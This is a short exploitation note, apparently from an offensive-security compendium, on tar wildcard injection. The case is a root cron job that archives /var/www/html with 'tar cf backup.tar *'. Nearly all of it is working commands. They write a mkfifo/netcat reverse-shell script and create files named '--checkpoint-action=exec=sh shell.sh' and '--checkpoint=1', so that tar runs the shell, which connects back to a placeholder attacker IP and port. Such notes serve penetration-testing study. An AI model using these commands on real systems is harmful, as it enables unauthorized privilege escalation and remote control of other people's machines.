killchain-compendium/exploit/wildard_exploitation.md

770 B

Wildcard usage

Another Example

  • cronjob gets backup data from /var/www/html via tar cf backup.tar *. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"

or

echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"